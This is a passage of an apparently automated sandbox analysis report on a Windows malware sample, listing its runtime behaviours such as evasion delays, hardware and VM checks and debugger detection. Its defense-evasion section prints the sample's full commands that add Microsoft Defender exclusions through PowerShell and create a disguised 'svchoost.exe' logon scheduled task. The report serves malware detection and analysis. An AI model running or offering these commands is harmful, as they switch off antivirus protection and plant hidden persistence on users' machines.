                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\WCTVN\mmytljldrgl.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeMemory allocated: 1A9C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeMemory allocated: 1B0D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeMemory allocated: B80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeMemory allocated: 1A7C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BAAF1F2 str ax27_2_00007FFD9BAAF1F2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5954Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3787Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6775Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2825Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeWindow / User API: threadDelayed 5274Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeWindow / User API: threadDelayed 4409Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep count: 5954 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep count: 3787 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep count: 6775 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064Thread sleep count: 2825 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exe TID: 3632Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 7520Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 7516Thread sleep count: 5274 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 7516Thread sleep count: 4409 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 7504Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76A3798 FindFirstFileExW,0_2_00007FF7E76A3798
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeThread delayed: delay time: 922337203685477
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A922000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A992000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A99C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Y
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A992000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWb
                  Source: Client.exe, 0000001B.00000002.2970279187.000000001BE8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76956C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E76956C8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76A7CF8 GetProcessHeap,0_2_00007FF7E76A7CF8
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E768C04C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7E768C04C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76956C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E76956C8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E768C5A4 SetUnhandledExceptionFilter,0_2_00007FF7E768C5A4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E768C400 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E768C400
                  Source: C:\WCTVN\mmytljldrgl.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E7681F10 GetModuleFileNameA,ShellExecuteExA,GetLastError,0_2_00007FF7E7681F10
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\WCTVN\mmytljldrgl.exe "C:\WCTVN\mmytljldrgl.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /fJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeProcess created: C:\Users\user\AppData\Roaming\SubDir\Client.exe "C:\Users\user\AppData\Roaming\SubDir\Client.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /fJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E7683520 GetConsoleWindow,ShowWindow,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E7683520
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76ADA00 cpuid 0_2_00007FF7E76ADA00
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: GetLocaleInfoW,0_2_00007FF7E769F048
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: GetLocaleInfoW,0_2_00007FF7E76A78AC
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF7E76A77FC
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF7E76A6F98
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: GetLocaleInfoW,0_2_00007FF7E76A76A4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF7E76A745C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: EnumSystemLocalesW,0_2_00007FF7E769EBC8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: EnumSystemLocalesW,0_2_00007FF7E76A73C4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: EnumSystemLocalesW,0_2_00007FF7E76A72F4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF7E76A79E0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeQueries volume information: C:\WCTVN\mmytljldrgl.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeQueries volume information: C:\Users\user\AppData\Roaming\SubDir\Client.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeQueries volume information: C:\Users\user\AppData\Roaming\SubDir\Client.exe VolumeInformation
